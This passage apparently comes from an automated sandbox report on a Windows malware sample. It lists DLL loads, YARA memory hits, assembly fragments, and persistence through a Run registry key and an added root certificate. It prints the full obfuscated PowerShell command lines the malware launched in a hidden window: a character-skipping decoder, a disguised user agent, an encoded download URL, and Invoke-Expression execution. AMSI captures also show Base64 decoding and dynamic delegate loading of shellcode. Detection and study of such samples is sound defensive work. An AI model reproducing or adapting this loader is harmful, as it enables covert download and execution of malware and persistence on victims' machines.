                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.2031771980.00000000070AC000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 00000004.00000002.2042394104.0000000008B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2041820420.00000000083A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2020592068.000000000568C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1842948147.00000299B0691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($abject)$GLOBAL:NMT = [SYstEm.TExT.eNCoDINg]::ASCiI.getStrInG($ARAcHNidaN)$GlOBAL:TUi=$NMt.SUBSTRiNg($BRASiLetE,$DUnkElt)<#Agerkok Teknologiomraader Skabelses Capeadores Conciliationi
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Taleboble202 $miscarriednnoncering $Blotchy), (Indtegnedes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Skravlenes = [AppDomain]::CurrentDomain.GetAssem
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Soshed)), $Crinoidal).DefineDynamicModule($Prsteskabernes, $false).DefineType($Prrieulv, $Alienates, [System.MulticastDelegate])$Hepta
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($abject)$GLOBAL:NMT = [SYstEm.TExT.eNCoDINg]::ASCiI.getStrInG($ARAcHNidaN)$GlOBAL:TUi=$NMt.SUBSTRiNg($BRASiLetE,$DUnkElt)<#Agerkok Teknologiomraader Skabelses Capeadores Conciliationi
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i O
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese i
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i OJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,14_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B87122F pushfd ; iretd 2_2_00007FFD9B871232
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B870988 push E95AECD0h; ret 2_2_00007FFD9B8709C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8700BD pushad ; iretd 2_2_00007FFD9B8700C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00A9C890 pushfd ; ret 4_2_00A9C899
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A510A6 push ebp; retf 4_2_08A510A7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4ECBD push ebp; iretd 4_2_08A4ECBF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4E0EE push ebp; iretd 4_2_08A4E0EF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A514FB push cs; iretd 4_2_08A51507
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4DCDF push 5523E1CEh; iretd 4_2_08A4DD1B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A504DB push ebp; iretd 4_2_08A504DF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4B87A push esi; iretd 4_2_08A4B96B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4D84E push ebp; iretd 4_2_08A4D84F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4EC4A push ebp; iretd 4_2_08A4EC4B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A50056 push ebp; iretd 4_2_08A50057
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4D18E push FFFFFF92h; iretd 4_2_08A4D257
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A505E6 push esp; iretd 4_2_08A505EF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4F52A push esi; iretd 4_2_08A4F52B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4B96D push esi; iretd 4_2_08A4B96B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A506BA pushfd ; iretd 4_2_08A506BC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A50281 push es; ret 4_2_08A50282
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A46282 push ebp; retf 4_2_08A46283
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4D6ED push ebp; iretd 4_2_08A4D707
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A46AD1 push cs; iretd 4_2_08A46AEF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4C230 push ss; ret 4_2_08A4C233
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4E206 push ebp; iretd 4_2_08A4E207
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4D246 push FFFFFF92h; iretd 4_2_08A4D257
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4DA5E push ebp; iretd 4_2_08A4DA5F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4DFAC push ebp; iretd 4_2_08A4DFB7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4E7AE push ebp; iretd 4_2_08A4E7AF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4F3B3 push ds; retf 4_2_08A4F3B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A4FB98 push ebp; iretd 4_2_08A4FB9B

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_004047CB
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
